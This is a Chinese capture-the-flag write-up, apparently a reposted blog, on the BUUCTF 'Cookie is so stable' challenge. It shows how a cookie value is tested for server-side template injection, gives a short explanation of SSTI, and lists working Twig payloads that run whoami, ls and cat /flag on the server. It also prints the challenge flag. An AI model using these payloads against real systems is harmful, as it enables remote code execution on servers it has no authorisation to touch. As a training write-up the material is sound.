当前位置: 首页 > news >正文

BUUCTF——Cookie is so stable

BUUCTF——Cookie is so stable

进入靶场

在这里插入图片描述

页面有点熟悉 跟之前做过的靶场有点像

先简单看一看靶场信息

在这里插入图片描述

有几个功能点

在这里插入图片描述

在这里插入图片描述

flag.php

随便输了个admin

在这里插入图片描述

根据题目提示

应该与cookie有关

抓包看看

在这里插入图片描述

构造payload

Cookie: PHPSESSID=ef0623af2c1a6d2012d57f3529427d52;   user={{7*'7'}}

在这里插入图片描述

有回显

漏洞能利用

确定了是SSTI注入漏洞

简单解释一下SSTI注入漏洞

SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,发生在应用程序使用模板引擎渲染用户输入时。当用户输入被直接嵌入到模板中而没有经过适当处理时,攻击者可以注入模板指令,从而在服务器上执行任意代码。

常见的易受攻击的模板引擎

  1. Java: FreeMarker, Velocity, Thymeleaf
  2. Python: Jinja2, Mako, Tornado
  3. PHP: Twig, Smarty
  4. JavaScript: Pug (Jade), Handlebars, EJS
  5. Ruby: ERB, Slim

漏洞原理

当应用程序这样处理用户输入时容易受到攻击:

# 危险示例 (Python/Jinja2)
from jinja2 import Templateuser_input = request.GET.get('name')
template = Template("Hello " + user_input)
rendered = template.render()

攻击者可以提交{{7*7}}作为输入,如果输出是Hello 49,则表明存在SSTI漏洞。

漏洞危害

  1. 远程代码执行(RCE)
  2. 敏感信息泄露
  3. 服务器文件系统访问
  4. 网络访问
  5. 权限提升

检测方法

尝试插入简单的模板表达式如{{7*7}}${7*7}<%= 7*7 %>,观察是否被计算

确定是php的SSTI漏洞

构造payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

在这里插入图片描述

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("ls /")}}

在这里插入图片描述

回显不完整,那就盲猜在根目录下

构造payload直接读取

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

在这里插入图片描述

拿到flag

flag{82e4f065-ae52-4f68-b994-ef7cd86b13be}

下播!!!!

在这里插入图片描述

http://www.xdnf.cn/news/371971.html

相关文章:

  • 《C++探幽:模板从初阶到进阶》
  • Docker Desktop安装在其他盘
  • [面试]SoC验证工程师面试常见问题(七)低速接口篇
  • rust-candle学习笔记13-实现多头注意力
  • Skyvern:用 AI+视觉驱动浏览器自动化
  • FreeTex v0.2.0:功能升级/支持Mac
  • Ubuntu 22.04(WSL2)使用 Docker 安装 Zipkin 和 Skywalking
  • 【含文档+PPT+源码】基于微信小程序的社区便民防诈宣传系统设计与实现
  • 基本句子结构
  • 前端取经路——现代API探索:沙僧的通灵法术
  • 每天五分钟机器学习:KTT条件
  • 在 Excel 中有效筛选重复元素
  • Stable Diffusion XL 文生图
  • 【金仓数据库征文】金融行业中的国产化数据库替代应用实践
  • C语言的中断 vs Java/Kotlin的异常:底层机制与高级抽象的对比
  • 365打卡第R8周: RNN实现阿尔茨海默病诊断
  • RAG 2.0 深入解读
  • 内存、磁盘、CPU区别,Hadoop/Spark与哪个联系密切
  • 海盗王64位服务端+32位客户端3.0版本
  • k8s删除pv和pvc后,vg存储没释放分析
  • Leetcode (力扣)做题记录 hot100(543,102,35,101)
  • AI:PS软件:ps软件中如何使用人工智能(AI)?
  • SierraNet协议分析使用指导[RDMA]| 如何设置 NVMe QP 端口以进行正确解码
  • 画立方体软件开发笔记 js three 投影 参数建模 旋转相机 @tarikjabiri/dxf导出dxf
  • 代码随想录第41天:图论2(岛屿系列)
  • Git简介和发展
  • 代码复用与分层
  • 双目视觉系统中,极线校正(Epipolar Rectification)与单应性矩阵/多平面单应性模型
  • 通过推测搜索加速大型语言模型推理 (SpecSearch) 论文总结
  • 零基础入门MySQL:10分钟搞定数据库基本操作